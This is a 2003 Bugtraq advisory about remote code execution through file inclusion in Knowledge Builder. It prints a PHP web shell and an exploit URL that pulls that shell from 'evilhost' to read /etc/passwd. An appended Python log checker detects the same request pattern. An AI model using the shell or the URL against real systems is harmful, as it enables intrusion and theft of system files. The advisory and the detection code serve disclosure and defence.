[32947] in bugtraq


Remote Code Execution in Knowledge Builder.

daemon@ATHENA.MIT.EDU (Zero_X www.lobnan.de Team)
Fri Dec 26 16:21:01 2003

Date: 24 Dec 2003 13:45:22 -0000
Message-ID: <20031224134522.10910.qmail@sf-www2-symnsj.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: "Zero_X www.lobnan.de Team" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com



Remote Code Execution in Knowledge Builder.

"Knowledge Builder" from www.activecampaign.com allows code to be executed.

Example:

Create the following file on your webserver:

----index.php----
<?
system($cmd);
?>
-----------------

And then type in the following URL:

http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat /etc/passwd


Zero X, member of www.lobnan.de and www.lostkey.org
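
Added example (not part of the original advisory and not vendor code): a log check for the request shape shown above, where the "page" parameter carries a remote URL instead of a page name. The log lines are constructed, the watched parameter name is taken from the advisory's URL, and the check goes beyond the advisory's http:// case by also matching other PHP stream wrappers and percent-encoded values.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# URL schemes / PHP stream wrappers that should never start a page-name value.
# The advisory shows http:// only; the others are added here as a generalization.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect):", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S.*?) HTTP/\d(?:\.\d)?"')

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Dec/2003:16:21:01 +0000] "GET /kb/index.php?page=faq HTTP/1.0" 200 5120
192.0.2.66 - - [26/Dec/2003:16:22:40 +0000] "GET /kb/index.php?page=http://evilhost/index&cmd=cat%20/etc/passwd HTTP/1.0" 200 311
192.0.2.66 - - [26/Dec/2003:16:23:02 +0000] "GET /kb/index.php?page=HTTP%3A%2F%2Fevilhost%2Findex HTTP/1.0" 200 298
192.0.2.66 - - [26/Dec/2003:16:23:30 +0000] "GET /kb/index.php?page=http%253A%252F%252Fevilhost%252Findex HTTP/1.0" 200 0
192.0.2.11 - - [26/Dec/2003:16:25:00 +0000] "GET /kb/search.php?q=http+proxy+setup HTTP/1.0" 200 2048
"""

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (bounded) so double-encoded values are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_includes(log_text, params=("page",)):
    """Return (client, param, decoded_value) for each logged request whose
    watched parameter holds a remote URL or stream wrapper, not a page name."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(value)
            if name.lower() in params and REMOTE_VALUE.search(value):
                hits.append((line.split()[0], name, value))
    return hits

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print(hit)
```

Only the query string of logged requests is examined, so a value sent in a POST body does not appear in this check.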
